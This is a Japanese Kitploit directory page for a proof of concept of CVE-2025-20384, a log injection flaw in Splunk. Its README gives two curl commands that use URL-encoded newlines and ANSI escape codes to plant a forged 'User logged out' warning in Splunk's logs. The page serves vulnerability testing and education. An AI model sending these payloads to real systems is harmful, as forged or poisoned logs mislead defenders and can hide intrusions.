Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-20384 — Splunkのログインジェクションおよびログポイズニングを、細工したURLパラメータを介して実証する概念実証であり、OWASPのログインジェクションリスクを浮き彫りにします。 | Kitploit
ツール/GitHubGitHub/axselll/cve-2025-20384
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト学習と教育ログ分析
GitHubaxselll/cve-2025-20384

CVE-2025-20384

Splunkのログインジェクションおよびログポイズニングを、細工したURLパラメータを介して実証する概念実証であり、OWASPのログインジェクションリスクを浮き彫りにします。

リポジトリを見る
28ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SPLUNK CVE-2025-20384

なぜか知らないけど、友達が送ってきたものを読んで、適当なJavaScriptコードを打ち始めた。

Log Injection/Forgery/Poisoning/Obfuscate type POC

この記事をお読みください OWASP Log Injection

TL;DR

  • 静的ファイルを探し、それを渡してランダムなパラメータを追加する
  • そこで、以下のように実行する。curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" または curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"
  • ランダムな改行が表示された場合、それはポイズニングです。単なる「普通の」ポイズニングなので問題ないように感じるかもしれませんが、標的にされると厄介です。

参考

CVEレコードへのリンク

ツールをダウンロード